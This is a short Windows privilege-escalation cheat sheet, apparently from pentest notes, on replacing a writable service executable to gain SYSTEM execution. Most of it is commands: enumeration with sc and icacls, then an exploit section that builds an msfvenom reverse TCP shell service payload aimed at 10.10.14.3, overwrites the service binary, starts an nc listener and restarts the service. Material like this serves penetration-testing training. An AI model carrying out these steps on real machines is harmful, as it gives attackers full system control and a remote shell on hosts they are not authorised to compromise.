Service binary replacement abuses write access to an executable that is launched by a privileged service.
The primitive is file control over a trusted execution path. If the service runs as LocalSystem, replacing the service executable can result in SYSTEM code execution when the service starts.
When enumerating service binary replacement opportunities, try to identify:
- Service binary path
- Service account context
- Writable service executable
- Writable service executable directory
- Service restart rights
- Original binary hash and backup path
Enumeration
Identify the service binary:
sc qc <ServiceName>
Check permissions:
icacls "C:\Path\To\Service.exe"
icacls "C:\Path\To"
Check service context:
sc qc <ServiceName> | findstr /i "SERVICE_START_NAME"
Interesting findings include:
- Service runs as
LocalSystem - Current user can overwrite the service executable
- Current user can write to the service directory
- Service can be restarted by the current user
Once write access and a trigger are confirmed, replace the binary with a service-compatible payload.
Exploit
- Record the service configuration and preserve the original binary.
sc qc <ServiceName>
copy "C:\Path\To\Service.exe" "C:\Users\Public\Service.exe.bak"
- Generate a service-compatible payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9443 -f exe-service -o Service.exe
- Replace the service binary.
copy /Y Service.exe "C:\Path\To\Service.exe"
- Start a listener.
nc -lnvp 9443
- Restart the service.
sc stop <ServiceName>
sc start <ServiceName>
- Verify the resulting context.
whoami
whoami /priv
This can break production services. Preserve the original binary, file owner, ACL, and service path before replacing anything.